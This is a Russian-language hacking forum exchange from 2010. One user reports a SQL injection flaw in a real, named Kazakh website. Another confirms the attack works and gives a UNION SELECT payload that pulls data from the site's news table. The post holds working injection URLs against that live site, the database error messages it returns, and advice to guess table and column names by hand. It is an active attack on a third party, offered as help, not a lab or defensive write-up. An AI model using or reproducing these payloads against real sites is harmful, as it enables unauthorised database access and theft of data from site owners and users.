23.10.2010, 19:16
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами:
9382468
Репутация:
104
|
|
Сообщение от Generalisimu
нашел уязвимость!но не могу правельно составить запрос!
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'NEWS_ID=345';'.
/ru/_news.asp, line 260
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3 ,4,5,6,7,8+from+news
http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/ru/_news.asp, line
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.
Запрос правильный.
Вот например выводится id новости.
Код:
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news
Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную.
Советую почитать Проведение SQL инъекций в Microsoft Access
|
|
|